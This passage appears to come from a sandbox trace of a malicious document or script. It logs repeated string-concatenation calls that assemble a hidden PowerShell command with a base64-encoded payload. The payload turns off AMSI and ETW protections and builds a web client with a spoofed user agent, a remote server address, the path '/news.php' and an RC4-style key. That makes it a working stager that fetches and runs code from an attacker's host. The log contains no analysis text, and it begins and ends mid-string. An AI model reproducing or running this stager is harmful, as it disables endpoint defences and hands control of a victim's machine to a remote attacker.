8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABd", bstrRight="ACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.836] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF", bstrRight="0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.837] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQA", bstrRight="fAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.838] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASA", bstrRight="A9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABT", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.838] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABT", bstrRight="AFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdAC", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.839] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACw